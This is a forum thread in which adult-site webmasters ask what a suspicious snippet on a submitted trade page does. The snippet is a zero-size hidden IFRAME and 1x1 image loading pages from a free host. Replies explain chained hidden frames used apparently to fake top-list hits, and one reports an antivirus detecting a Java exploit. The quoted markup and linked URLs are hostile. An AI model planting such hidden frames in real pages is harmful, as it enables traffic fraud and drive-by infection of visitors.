Anyone know what this code does?

[Cleo]

I've had someone trying to add domains to my traffic trade with this code on the page for the last few days.

<IFRAME SRC='http://www.terra.es/personal7/jimka23/traders2.htm' WIDTH='0' HEIGHT='0'></IFRAME><img src='http://www.terra.es/personal7/jimka23/1.gif' height='0'
width='0' border='0'>

It causes the page just to open and close in Safari and does nothing at all in my other browsers. I'm guessing it is something bad and been deleting the trades, but would like to know what it actually is.

Until I approve a trade no one but me even sees it so it is just a waste of time for all.

[Surfn]

It looks like a frame so that when the surfer scrolls down the page their add is always visible?

Terra.es has been around for a long time. They have their own TGP's and LL's. Who knows what they are trying to do?

[Cleo]

This is the page that the code is on
http://tgp.slutvirgins.com/

None of the Windows crap that adds bookmarks or changes your home page does anything on a Mac so I tend to just delete anything with code in it that I think looks funky to be safe since I can't tell for sure.

[Surfn]

I didn't see any frames. But all the thumbs are "target_new" opening a different page on their sites each time. Hence the rotator script.

POS!!

[Cleo]

Yeah it was instant decline as soon as I saw the POS, but I still wanted to know what they were trying to do.

[Surfn]

I imagine they were trying to steal traffic from unsuspecting webmasters. |pissed|

[Cleo]

Your powers of deduction are simply amazing Surfn. LOL

[Greenguy]

An IFRAME allows you to load another page onto an area of your site (just a different version of normal frames I assume)

By loading it at 1x1 the page gets a "hit" but is never displayed.

DrB just posted someplace that he found someone doing this with his site in order to get onto his top list


Surfn - I'm pretty sure terra.es is a free host.

[Surfn]

Quote:

Originally posted by Greenguy
Surfn - I'm pretty sure terra.es is a free host.

Yes, and they host some huge sites...that suk.

[Cleo]

Yeah an iframe does load another page much the same way a frame does.

Terra.es is a free host full of crap.

This I already knew, I was trying to find out if they were trying to change home pages or something like that. I guess since since you two Windows users aren't bitching that it fucked with your browser it doesn't.

[Opti]

the first iframe loads 2 more urls in other iframes....



http://ohwqh.selfbookmark.info/enter.cgi?id=2034
and
http://cr.global-counter.com

someone else might be able to explain what those 2 do and why the webmaster is loading them like that.

I'm not sure I would click those URL's unless you know what you are doing.. they try and start the JVM on my XP machine

[Greenguy]

Ok - let's say this guy is loading a 1x1 frame on his site pointing to terra.es - the page over there loads 1 or more 1x1 frames that referance other domains/pages - those pagfes do the same & referance other pages & so on down the line.

Sooner or later you're gonna fine one that's loading a top list or some sorta of referral page & that's where this guy is fucking people.

Odds are there's probably 10-20 top lists being fucked someplace down the line.

[Cleo]

Looks like I will be banning the word iframe. Shouldn't be a big deal since I can't remember the last time I saw an iframe used for something legit.

[Opti]

I use iframes in a few places for legit reasons..

there is 2 of them on This Page... as I cant use PHP scripting directly in a CGI generated page

But I cant see too many good reasons to need one on a freesite

[amber438]

I just loaded the page into ie6 and my anti virus (panda) found a bug
Exploit/ByteVerify from that page..
it goes into c:/documents and settings/yourname/localsettings/temp

not good at all